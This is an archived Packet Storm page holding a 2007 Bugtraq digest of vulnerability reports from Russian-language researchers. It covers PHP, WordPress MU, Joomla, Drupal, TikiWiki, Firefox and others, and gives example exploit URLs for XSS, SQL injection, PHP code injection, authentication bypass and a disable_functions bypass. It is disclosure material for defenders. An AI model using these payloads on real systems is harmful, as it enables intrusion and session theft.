exploit the possibilities

russian-multi.txt

russian-multi.txt
Posted Oct 11, 2007
Site securityvulns.ru

Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.

tags | exploit, php, vulnerability
MD5 | 4b87050e30aa5d9af249766005c08d38

russian-multi.txt

Change Mirror Download
Dear bugtraq@securityfocus.com,

Vulnerabilities reported by different Russian speaking authors to
http://securityvulns.ru

1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4
and 5.

disable_functions feature can be bypassed by using functions alias. A
list of aliases is given in http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.

SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html

2. MustLive reports Crossite-Cripting vulnerability in WordPress
MultiUser 1.0

XSS is possible via Username form field.

Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html

3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5

Example:

http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

Original message (in Russian): http://securityvulns.ru/Rdocument901.html

4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13

An example of vulnerability is

http://site/index.php?option=com_search&searchword=';alert('XSS')//

Additional information (in Ukranian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html

5. durito [NGH Group] reports crossite-scripting vulnerability in
ActiveKB NX 2.5.4

Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]

Original message (in Russian): http://securityvulns.ru/Rdocument956.html

6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)

Vulnerability example:

http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();

Original message (in Russian): http://securityvulns.ru/Rdocument957.html

7. MustLive reports cross-site scripting vulnerability in Nucleus.

Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html

8. durito [NGH Group] reports

8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:

Content Management System

http://www.example.com/main.php?p=[SQL]

Merchant

http://www.example.com/shop.php?cmd=sto&id=[SQL]

Courses

http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]

8.2 Information leak (FTP access account) with MyFTPUploader within
same applications. Example:

http://www.example.com/include/imageupload.js

contains

document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');

8.3 Default administrator's password for same applications.

Original message (in Russian): http://securityvulns.ru/Sdocument4.html

9. MustLive reports multiple crossite scripting vulnerabilities in
Site-Up <= 2.64

Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:

Additional information (in Ukranian): http://websecurity.com.ua/1210/
Original message: (in Russian): http://securityvulns.ru/Sdocument12.html

10. MustLive reports crossite scripting in Google Search Appliance.

Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'

Additional information (in Ukranian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html

10. MustLive reports crossite scripting in PRO-search

Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html

10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is also
authentication bypass (access without username/password).

Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5

Additional information (in Ukranian): http://websecurity.com.ua/1283/
Original message: (in Russian): http://securityvulns.ru/Sdocument90.html

11. MustLive reports crossite scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URL if UTF-7 if page content is displayed as
UTF-7. Examples:

For Firefox before 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According to author, it's possible to execute script in both local zone
and context of gopher site.

12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

Original message (in Russian): http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html












--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    1 Files
  • 25
    Jul 25th
    1 Files
  • 26
    Jul 26th
    21 Files
  • 27
    Jul 27th
    8 Files
  • 28
    Jul 28th
    9 Files
  • 29
    Jul 29th
    12 Files
  • 30
    Jul 30th
    9 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close